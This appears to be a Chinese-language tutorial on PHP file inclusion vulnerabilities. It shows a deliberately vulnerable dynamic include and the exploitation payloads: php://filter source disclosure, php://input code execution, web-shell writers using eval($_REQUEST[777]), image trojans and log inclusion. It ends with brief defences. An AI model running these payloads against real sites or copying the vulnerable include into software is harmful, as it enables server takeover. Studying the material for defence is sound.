文章目录
文件包含漏洞
程序开发人员通常会把可重复使用函数或语句写到单个文件中,形成"封装"。在使用某个功能的时候,直接调用此文无需再次编写,提高代码重用性,减少代码量。这种调用文件的过程通常称为包含件,
程序开发人员都希望代码更加灵活,所以会把被包含的文件的路径设置为变量,来进行动态调用(包含》,但正是由于这种灵活性,如果被包含文件的路径客户端可控,造成任意文件包含漏洞。
几乎所有的脚本都会提供文件包含的功能,文件包含漏洞在PHP 的web 应用中居多,在JSP/ASP/ASP.NET 程序中比较
少
php中文件包含的语句
- include() : 多次包含,多次执行;如果失败,脚本会警告,但是继续运行
- include_once() : 多次包含,执行一次;如果失败,脚本会警告,但是继续运行
- require() : 多次包含,多次执行;如果失败,脚本会产生错误结束执行
- require_once() : 多次包含,一次执行,如果包含失败,脚本产生错误,结束执行。
文件包含
动态包含
php
$path = @$_GET['filepath'];
@include $path;
相关配置
可以通过修改php.ini文件进行对远程文件包含进行配置
allow_url_fopen=On/Off #通过远程方式打开文件
allow_url_include= On/Off # 通过远程方式包含文件
本地文件包含
通过本地路径访问文件
php
text.php?path=../../phpinfo.php
远程文件包含
远程文件包含通过一些协议进行远程路径访问
text.php?path=http://../phpinfo.php
在虚拟机里读取了我桌面的文件
漏洞原理
PHP 文件包含是程序设计的基础功能之一,能够减少代码量,提高开发效率。但是使用文件包含功能时,有类似于以上试代码的设计,实现了动态包含,就有产生文件包含漏洞的风险。如果实现动态包含的参数,web 应用没有进行严格的校浏览器客户端用户可以影响控制被包含文件的路径,就会产生任意文件包含漏洞。
特点
在文件包含中是无视文件扩展名,以二进制的方式读取文件,其中就给,图片中插入一句话木马留了后路
利用方法
包含图片木马
上传图片木马菜刀直接连接
读取敏感文件
利用文件包含漏洞,也可以读取敏感文件。前提条件:
-
目标文件存在(已知目标文件路径)
-
具有文件可读权限
-
使用相对路径
-
使用绝对路径
-
使用封装协议
封装协议 说明 file:// 访问本地文件系统 http:// 访问 HTTP(s) 网址 ftp:// 访问 FTP(s) URLs php:// 访问各个输入/输出流(I/O streams) zlib:// 压缩流 data:// 数据(RFC 2397) glob:// 查找匹配的文件路径模式 phar:// PHP 归档 ssh2:// Secure Shell 2 rar:// RAR ogg:// 音频流 expect:// 处理交互式的流
读取php源码
使用php伪协议读取PHP代码
text
?filepath=php://filter/read=convert.base64-encode/resource=[目标文件]
执行php代码
利用I/O流 I : input O:output
-
利用 php://input 执行PHP 命令;
-
远程文件包含开启
将请求改为post请求,在请求正文可以执行php代码
text
POST /file-include/include.php?filepath=php://input HTTP/1.1
<?php phpinfo();?>
包含图片马写 shell
条件:
-
确定文件包含漏洞存在
-
菜刀不能直接连接
写入shell
php
<?php fputs(fopen("shell.php",'w'),'<?
=@eval($_REQUEST[777]);phpinfo();?>')?>
<?php file_put_contents('shell.php','<?php @eval($_REQUEST[777])?>')?
>利用
text
http://127.0.0.1/shell.php包含日志
Apache 日志
- 访问日志
- 错误日志
Nginx 日志
- 访问日志
- 错误日志
SSH 日志
- 邮件日志
文件包含防御
-
尽量少的使用动态包含
-
严格过滤被包含文件的路径。
-
将参数 allow_url_include 设置为 Off
-
使用参数 open_basedir 限定文件访问范围限定于web根目录下
phpopen_basedir =c:\phpstudy_2016\www\